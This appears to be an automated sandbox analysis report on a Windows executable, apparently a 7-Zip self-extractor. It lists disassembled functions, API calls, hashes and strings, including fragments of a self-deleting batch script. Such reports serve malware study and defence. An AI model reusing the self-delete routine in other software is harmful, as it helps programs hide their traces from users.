                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                          • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                          • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                          • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                          Function 0041206B Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                          • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                          • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                          • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                          Function 00411F91 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                          • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                          • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                          • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                          Function 0040D72E Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                          • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                          • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                          • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                          Function 00404AFF Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                          • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                          • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                          • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                          • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                          • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                          • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                          • API String ID: 3007203151-3467708659
                                          • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                          • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                          • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                          • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                          Function 00404603 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 207stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                            • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                            • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                            • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                            • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                            • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                            • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                            • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                            • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                            • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                          • _wtol.MSVCRT ref: 004047DC
                                          • _wtol.MSVCRT ref: 004047F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                          • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                          • API String ID: 2725485552-3187639848
                                          • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                          • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                          • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                          • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                          Function 00402DC0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                          • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                            • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                            • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                            • Part of subcall function 00401A85: CharUpperW.USER32(?,7622E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                            • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                          • GetParent.USER32(?), ref: 00402E2E
                                          • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                          • GetMenu.USER32(?), ref: 00402E55
                                          • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                          • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                          • DestroyWindow.USER32(?), ref: 00402EA3
                                          • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                          • GetSysColor.USER32(0000000F), ref: 00402EBC
                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                          • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                          • String ID: RichEdit20W$STATIC$riched20${\rtf
                                          • API String ID: 1731037045-2281146334
                                          • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                          • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                          • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                          • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                          Function 00401CC8 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowDC.USER32(00000000), ref: 00401CD4
                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                          • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                          • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                          • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                          • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                          • SelectObject.GDI32(00000000,?), ref: 00401D60
                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                          • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                          • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                          • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                          • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                          • DeleteDC.GDI32(00000000), ref: 00401DC2
                                          • DeleteDC.GDI32(00000000), ref: 00401DC5
                                          • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                          • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                          • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                          • String ID:
                                          • API String ID: 3462224810-0
                                          • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                          • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                          • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                          • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                          Function 00401DF3 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                          • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                          • GetMenu.USER32(?), ref: 00401E44
                                            • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                            • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                            • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                            • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                            • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                            • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                          • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                          • CoInitialize.OLE32(00000000), ref: 00401E8C
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                          • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                            • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                            • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                            • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                            • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                            • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                            • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                            • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                            • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                            • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                            • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                            • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                            • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                            • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                            • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                            • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                            • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                          • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                          • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                          • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                          • String ID: IMAGES$STATIC
                                          • API String ID: 4202116410-1168396491
                                          • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                          • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                          • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                          • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                          Function 0040813D Relevance: 27.1, APIs: 18, Instructions: 147windowcomtimeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                            • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                          • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                          • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                          • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                          • SetWindowLongW.USER32(00000000), ref: 004081D8
                                          • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                          • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                          • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                          • SetFocus.USER32(00000000), ref: 0040821D
                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                          • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                          • GetDlgItem.USER32(?,00000002), ref: 00408294
                                          • IsWindow.USER32(00000000), ref: 00408297
                                          • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                          • EnableWindow.USER32(00000000), ref: 004082AA
                                          • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                          • ShowWindow.USER32(00000000), ref: 004082C1
                                            • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                            • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                            • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                            • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                            • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                            • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                            • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                            • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                            • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                            • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                            • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                            • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                          • String ID:
                                          • API String ID: 855516470-0
                                          • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                          • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                          • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                          • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                          Function 00403093 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 244stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                          • strncmp.MSVCRT ref: 004031F1
                                          • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                          • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                          • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2347027725.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000010.00000002.2347009779.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347049723.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347068990.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.000000000041A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000010.00000002.2347086499.0000000000432000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_400000_AUGUST.jbxd
                                          Similarity
                                          • API ID: ??3@$lstrcmpstrncmp
                                          • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                          • API String ID: 2881732429-172299233
                                          • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                          • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                          • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                          • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                          Function 00406A47 Relevance: 24.3, APIs: 16, Instructions: 270COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                          • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                          • GetSystemMetrics.USER32(00000010), ref: 00406B0B
